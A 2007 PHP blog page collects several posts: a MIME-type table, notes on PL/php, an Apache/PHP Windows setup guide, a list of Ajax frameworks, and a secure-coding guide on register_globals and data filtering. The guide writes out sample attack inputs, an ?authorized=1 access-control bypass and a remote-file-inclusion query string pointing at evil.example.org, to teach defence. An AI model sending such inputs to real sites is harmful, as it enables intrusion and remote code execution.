sst	application/vnd.ms-pkicertstore
stl	application/vnd.ms-pkistl
stm	text/html
svg	image/svg+xml
sv4cpio	application/x-sv4cpio
sv4crc	application/x-sv4crc
swf	application/x-shockwave-flash
t	application/x-troff
tar	application/x-tar
tcl	application/x-tcl
tex	application/x-tex
texi	application/x-texinfo
texinfo	application/x-texinfo
tgz	application/x-compressed
tif	image/tiff
tiff	image/tiff
tr	application/x-troff
trm	application/x-msterminal
tsv	text/tab-separated-values
txt	text/plain
uls	text/iuls
ustar	application/x-ustar
vcf	text/x-vcard
vrml	x-world/x-vrml
wav	audio/x-wav
wcm	application/vnd.ms-works
wdb	application/vnd.ms-works
wks	application/vnd.ms-works
wmf	application/x-msmetafile
wps	application/vnd.ms-works
wri	application/x-mswrite
wrl	x-world/x-vrml
wrz	x-world/x-vrml
xaf	x-world/x-vrml
xbm	image/x-xbitmap
xla	application/vnd.ms-excel
xlc	application/vnd.ms-excel
xlm	application/vnd.ms-excel
xls	application/vnd.ms-excel
xlt	application/vnd.ms-excel
xlw	application/vnd.ms-excel
xof	x-world/x-vrml
xpm	image/x-xpixmap
xwd	image/x-xwindowdump
z	application/x-compress
zip	application/zip

Sunday, August 12, 2007

PHP Procedural Language for PostgreSQL

What is PL/php?

PL/php is a procedural language with hooks into the PostgreSQL database sytem, intended to allow writing of PHP functions for use as functions inside the PostgreSQL database. It was written by Command Prompt, Inc. and has since been open sourced and licensed under the PHP and PostgreSQL (BSD) licenses.

Download and Installation

Please see the installation documentation for instructions on how to install PL/php 1.0. To install the new code, which only works with PostgreSQL 8.0 and 8.1 and is currently in development, see this page instead.

Creating the PL/php language

Please see the documentation on how to create the language in a database once the library is installed. If you are using PostgreSQL 8.1 you must follow these other instructions instead.

Apache 2, PHP 4 & PHP 5 on Windows XP

This is a comprehensive guide to installing and running Apache 2.2.4 with PHP 4.4.7 and PHP 5.2.3 on Windows XP. It covers all of the steps in detail with lots of screen grabs so you can follow the process visually.

Update: The guide has been updated for PHP 5.2.3. I have also created a new forum here. Please use it if you run into trouble following this guide, I'll be only too happy to help. You don't even need to register to post.

The Guide

I know that the number of sections looks daunting, but that is because I have split the guide up into small manageable chunks. It shouldn't take you longer than a couple of minutes to complete each section.

Downloads

Configure Windows XP for PHP

PHP 4 Settings

PHP 5 Settings

Create a local web site

Setting the Environment Variable

Install Apache

Install the Apache2 Handler

httpd.conf

Creating a Virtual Host

system32/drivers/etc/hosts

Bring Apache to life

Switching to PHP 5

Useful Extras

Adding another web site (detailed version)

Adding another web site (short version)

Build a PHP 4/5 switcher

Run PHP 5 as a module and PHP 4 as CGI together

Troubleshooting

Apache won't start

Your guide doesn't work

They've just released a new version of PHP! Now what?

Can't you just do it for me?

Don't be disheartened by the length of the guide! There is no reason why you can't complete the entire process in under 30 mins, and you'll be rewarded with a versatile and feature-packed local development environment as your reward.

Who is this guide aimed at?

Everyone who posts in php-general / forums asking how to get PHP and Apache running on Windows so they can develop and test locally. Often they'll hit simple but annoying problems that can be easily fixed. I also wrote this as an alternative to using a 'WAMP' installer. Teaching yourself how to install and configure PHP/Apache is a very useful set of skills to have, and well worth adding to your knowledge set.

User Feedback

Since releasing this guide I've received some great emails from people who've had success with it. Here are some of my favourite quotes: "Thank you for your VERY helpful instructions! This point on I can now learn PHP a lot better on my own computer. Cheers!" (Patrick) - "I very much appreciate your guide - you made it really easy" (Terry) - "Richard, this is truly the best guide to setting up php and apache i've seen online. Thank you so much." (Edward) - "Thanks for the great and detailed guide" (Thijs). "Thank you very much for the php guide you spent a lot of hard work to make, the guide covered everything, screenshots, alternatives as well as any possible errors and was precise and right to the point, and because of it i finally have php installed on my computer and i can learn it more conviniently." (Gaurav)

Thanks guys :) BTW all the feedback I have received so far has been incorporated into the guide. Feel free to use the new forum (see below) to send your comments / suggestions.

WAMP Guide Forum

Need help on a more 'interactive' level? Then why not use the WAMP Guide Forum. Post any questions or problems you may have. You don't even need to register to join. We'll help you as much as we can.

Wednesday, August 8, 2007

PHP Ajax Frameworks

AJASON : AJASON is a PHP 5 library and JavaScript client
AjaxAC : AjaxAC is an open-source framework written in PHP
Ajax Agent : powerful open source framework for rapidly building Ajax or Rich Internet Applications (RIA)
Cajax : A PHP class library for writing powerfull reloadless web user interfaces using Ajax (DHTML+server-side) style
CakePHP : Cake is a rapid development framework for PHP which uses commonly known design patterns like ActiveRecord, Association Data Mapping, Front Controller and MVC.
Claw : a convenient and intuitive way of development of PHP5 driven object oriented applications.
DutchPIPE : PHP object-oriented framework to turn sites into real-time, multi-user virtual environments:
Flexible Ajax : Flexible Ajax is a handler to combine the remote scripting technology, also known as AJAX (Asynchronous Javascript and XML), with a php-based backend.
Guava : Groundwork Guava is a PHP-based application framework and environment.
HTML_AJAX : HTML_AJAX is a PEAR package for performing AJAX operations from PHP.
HTSWaf : The HTS Web Application Framework is a PHP and Javascript based framework designed to make simple web applications easy to design and implement.
My-BIC : My-BIC AJAX State of Mind for PHP harmony
PAJAJ : PHP Asynchronous Javascript and JSON
PAJAX : Remote (a)synchronous PHP objects in JavaScript
phpAjaxTags : phpAjaxTags is a port to PHP from java tag library AjaxTags.
PHPWebBuilder : PHPWebBuilder is a PHP framework designed following well-known object oriented designs and principles featuring a highly reusable components architecture, metadata based persistence and traditional GUI style programming support.
Qcodo : open-source PHP 5 framework
Simple AJAX : This tutorial demonstrates how to perform AJAX functionality simply and effectively, using the AJAX JSMX library, coupled with the JSON-PHP library.
symfony : open-source PHP5 web framework
TinyAjax : TinyAjax is a small php5 library that allows you to easily add AJAX-functionality to existing pages
xajax : Ajax-enable your PHP application with a simple toolkit that gets the job done fast.
XOAD : PHP based AJAX/XAP object oriented framework that allows you to create richer web applications
Zoop : oop is an object oriented framework for PHP based on a front controller. It is designed to be very fast and efficient and very nice for the programmer to work with.
Zephyr : zephyr is an ajax based framework for php5 developers.

Tuesday, August 7, 2007

PHP Security Guide

What Is Security?

Security is a measurement, not a characteristic.

It is unfortunate that many software projects list security as a simple requirement to be met. Is it secure? This question is as subjective as asking if something is hot.
Security must be balanced with expense.

It is easy and relatively inexpensive to provide a sufficient level of security for most applications. However, if your security needs are very demanding, because you're protecting information that is very valuable, then you must achieve a higher level of security at an increased cost. This expense must be included in the budget of the
project. Security must be balanced with usability.
It is not uncommon that steps taken to increase the security of a web application also decrease the usability. Passwords, session timeouts, and access control all create obstacles for a legitimate user. Sometimes these are necessary to provide adequate security, but
there isn't one solution that is appropriate for every application. It is wise to be mindful of your legitimate users as you implement security measures.
Security must be part of the design.

If you do not design your application with security in mind, you are doomed to be constantly addressing new security vulnerabilities.Careful programming cannot make up for a poor design.

Basic Steps

Consider illegitimate uses of your application.

A secure design is only part of the solution. During development, when the code is being written, it is important to consider illegitimate uses of your application. Often, the focus is on making the application work as intended, and while this is necessary to deliver a properly functioning application, it does nothing to help make the application secure.
Educate yourself.

The fact that you are here is evidence that you care about security, and as trite as it may sound, this is the most important step. There are numerous resources available on the web and in print, and several resources are listed in the PHP Security Consortium's
Library at http://phpsec.org/library/.
If nothing else, FILTER ALL EXTERNAL DATA.

Data filtering is the cornerstone of web application security in any language and on any platform. By initializing your variables and filtering all data that comes from an external source, you will address a majority of security vulnerabilities with very little effort. A whitelist approach is better than a blacklist approach. This means that you should consider all data invalid unless it can be proven valid (rather than considering all data valid unless it can be proven invalid).

Register Globals

The register_globals directive is disabled by default in PHP versions 4.2.0 and greater. While it does not represent a security vulnerability, it is a security risk. Therefore, you should always develop and deploy applications with register_globals disabled.

Why is it a security risk? Good examples are difficult to produce for everyone, because it often requires a unique situation to make the risk clear. However, the most common example is that found in the PHP manual:

<?php

if (authenticated_user())
{
   $authorized = true;
}

if ($authorized)
{
   include '/highly/sensitive/data.php';
}

?>

With register_globals enabled, this page can be requested with ?authorized=1 in the query string to bypass the intended access control. Of course, this particular vulnerability is the fault of the developer, not register_globals, but this indicates the increased risk posed by the directive. Without it, ordinary global variables (such as $authorized in the example) are not affected by data submitted by the client. A best practice is to initialize all variables and to develop with error_reporting set to E_ALL, so that the use of an uninitialized variable won't be overlooked during development.

Another example that illustrates how register_globals can be problematic is the following use of include with a dynamic path:

<?php

include "$path/script.php";

?>

With register_globals

enabled, this page can be
requested with
?path=http%3A%2F%2Fevil.example.org%2F%3F

in the query string in order to equate this example to the following:

<?php

include 'http://evil.example.org/?/script.php';

?>

If allow_url_fopen
is enabled (which it is by default, even in php.ini-recommended), this will include
the output of http://evil.example.org/ just as if it were a
local file. This is a major security vulnerability, and it is one that has
been discovered in some popular open source applications.

Initializing $path can mitigate this particular risk,
but so does disabling register_globals. Whereas a developer's mistake can lead to an uninitialized variable, disabling

register_globals is a global configuration change that is far less likely to be overlooked.

The convenience is wonderful, and those of us who have had to manually
handle form data in the past appreciate this. However, using the $_POST and
$_GET superglobal arrays is
still very convenient, and it's not worth the added risk to enable
register_globals. While I completely disagree with arguments that equate register_globals
to poor security, I do recommend that it be disabled.

In addition to all of this, disabling
register_globals encourages developers to be mindful of the
origin of data, and this is an important characteristic of any
security-conscious developer.

Data Filtering

As stated previously, data filtering is the cornerstone of web
application security, and this is independent of programming language or
platform. It involves the mechanism by which you determine the validity of
data that is entering and exiting the application, and a good software design
can help developers to:

Ensure that data filtering cannot be bypassed,
Ensure that invalid data cannot be mistaken for valid data,
and
Identify the origin of data.

Opinions about how to ensure that data filtering cannot be bypassed
vary, but there are two general approaches that seem to be the most common,
and both of these provide a sufficient level of assurance.

The Dispatch Method

One method is to have a single PHP script available directly from the
web (via URL). Everything else is a module included with
include or require as needed. This
method usually requires that a GET variable be passed along
with every URL, identifying the task. This GET variable can
be considered the replacement for the script name that would be used in a more
simplistic design. For example:

http://example.org/dispatch.php?task=print_form

The file dispatch.php is the only file within
document root. This allows a developer to do two important things:

Implement some global security measures at the top of
dispatch.php and be assured that these measures
cannot be bypassed.
Easily see that data filtering takes place when necessary, by
focusing on the control flow of a specific task.

To further explain this, consider the following example
dispatch.php script:

<?php

/* Global security measures */

switch ($_GET['task'])
{
   case 'print_form':
       include '/inc/presentation/form.inc';
       break;

   case 'process_form':
       $form_valid = false;
       include '/inc/logic/process.inc';
       if ($form_valid)
       {
           include '/inc/presentation/end.inc';
       }
       else
       {
           include '/inc/presentation/form.inc';
       }
       break;

   default:
       include '/inc/presentation/index.inc';
       break;
}

?>

If this is the only public PHP script, then it should be clear that the
design of this application ensures that any global security measures taken at
the top cannot be bypassed. It also lets a developer easily see the control
flow for a specific task. For example, instead of glancing through a lot of
code, it is easy to see that end.inc is only displayed to a
user when $form_valid is true, and
because it is initialized as false just before
process.inc is included, it is clear that the logic within
process.inc must set it to true,
otherwise the form is displayed again (presumably with appropriate error
messages).

Note
If you use a directory index file such as
index.php (instead of dispatch.php), you
can use URLs such as
http://example.org/?task=print_form.
You can also use the Apache ForceType directive or
mod_rewrite to accommodate URLs such as

http://example.org/app/print-form.

The Include Method

Another approach is to have a single module that is responsible for all
security measures. This module is included at the top (or very near the top)
of all PHP scripts that are public (available via URL). Consider the following
security.inc script:

<?php

switch ($_POST['form'])
{
   case 'login':
       $allowed = array();
       $allowed[] = 'form';
       $allowed[] = 'username';
       $allowed[] = 'password';

       $sent = array_keys($_POST);

       if ($allowed == $sent)
       {
           include '/inc/logic/process.inc';
       }

       break;
}

?>

In this example, each form that is submitted is expected to have a form
variable named form that uniquely identifies it, and

security.inc has a separate case to handle the data
filtering for that particular form. An example of an HTML form that fulfills
this requirement is as follows:

<form action="/receive.php" method="POST">
<input type="hidden" name="form" value="login" />
<p>Username:
<input type="text" name="username" /></p>
<p>Password:
<input type="password" name="password" /></p>

<input type="submit" />
</form>

An array named $allowed is used to identify exactly
which form variables are allowed, and this list must be identical in order for
the form to be processed. Control flow is determined elsewhere, and
process.inc is where the actual data filtering takes
place.

Note
A good way to ensure that security.inc is
always included at the top of every PHP script is to use the

auto_prepend_file directive.

Filtering Examples

It is important to take a whitelist approach to your data filtering, and
while it is impossible to give examples for every type of form data you may
encounter, a few examples can help to illustrate a sound approach.

The following validates an email address:

<?php

$clean = array();

$email_pattern = '/^[^@\s<&>]+@([-a-z0-9]+\.)+[a-z]{2,}$/i';

if (preg_match($email_pattern, $_POST['email']))
{
   $clean['email'] = $_POST['email'];
}

?>

The following ensures that $_POST['color'] is

red, green, or
blue:

<?php

$clean = array();

switch ($_POST['color'])
{
   case 'red':
   case 'green':
   case 'blue':
       $clean['color'] = $_POST['color'];
       break;
}

?>

The following example ensures that $_POST['num'] is
an integer:

<?php

$clean = array();

if ($_POST['num'] == strval(intval($_POST['num'])))
{
   $clean['num'] = $_POST['num'];
}

?>

The following example ensures that $_POST['num'] is a
float:

<?php

$clean = array();

if ($_POST['num'] == strval(floatval($_POST['num'])))
{
   $clean['num'] = $_POST['num'];
}

?>

Naming Conventions

Each of the previous examples make use of an array named
$clean. This illustrates a good practice that can help
developers identify whether data is potentially tainted. You should never make
a practice of validating data and leaving it in $_POST or

$_GET, because it is important for developers to always be
suspicious of data within these superglobal arrays.

In addition, a more liberal use of $clean can allow
you to consider everything else to be tainted, and this more closely resembles
a whitelist approach and therefore offers an increased level of
security.

If you only store data in $clean after it has been
validated, the only risk in a failure to validate something is that you might
reference an array element that doesn't exist rather than potentially tainted
data.

Timing

Once a PHP script begins processing, the entire HTTP request has been
received. This means that the user does not have another opportunity to send
data, and therefore no data can be injected into your script (even if
register_globals is enabled). This is why initializing your
variables is such a good practice.

Error Reporting

In versions of PHP prior to PHP 5, released 13 Jul 2004, error reporting
is pretty simplistic. Aside from careful programming, it relies mostly upon a
few specific PHP configuration directives:

error_reporting
This directive sets the level of error reporting desired. It is
strongly suggested that you set this to E_ALL for
both development and production.
display_errors
This directive determines whether errors should be displayed on
the screen (included in the output). You should develop with this set
to On, so that you can be alerted to errors during
development, and you should set this to Off for
production, so that errors are hidden from the users (and potential
attackers).
log_errors
This directive determines whether errors should be written to a
log. While this may raise performance concerns, it is desirable that
errors are rare. If logging errors presents a strain on the disk due
to the heavy I/O, you probably have larger concerns than the
performance of your application. You should set this directive to
On in production.
error_log
This directive indicates the location of the log file to which
errors are written. Make sure that the web server has write privileges
for the specified file.

Having error_reporting set to

E_ALL will help to enforce the initialization of variables,
because a reference to an undefined variable generates a notice.

Note
Each of these directives can be set with
ini_set(), in case you do not have access to
php.ini or another method of setting these
directives.
A good reference on all error handling and reporting functions is in the
PHP manual:

http://www.php.net/manual/en/ref.errorfunc.php
PHP 5 includes exception handling. For more information, see:

http://www.php.net/manual/language.exceptions.php

< Previous	Next >
Table of Contents	Form Processing

Tuesday, October 2, 2007

What Regular Expressions Are Exactly - Terminology

Different Regular Expression Engines

Give Regexes a First Try

Friday, September 28, 2007

Wednesday, August 29, 2007

Unicode

Register Globals to go

Magic Quotes to go

Safe Mode to go

'var' to alias 'public'

Return by Reference will error

zend.ze1 compatbility mode to go

Freetype 1 and GD 1 support to go

dl() moves to SAPI only

FastCGI always on

Register Long Arrays to go

Extension Movements

PHP Engine Additions

OO changes

Additions to PHP

Conclusion

Thursday, August 16, 2007

MIME Types By Content Type

Mime Types By File Extension

Sunday, August 12, 2007

What is PL/php?

Download and Installation

Creating the PL/php language

The Guide

Useful Extras

Troubleshooting

Who is this guide aimed at?

User Feedback

WAMP Guide Forum

Wednesday, August 8, 2007

Tuesday, August 7, 2007

Blog Archive

About Me

Developed Projects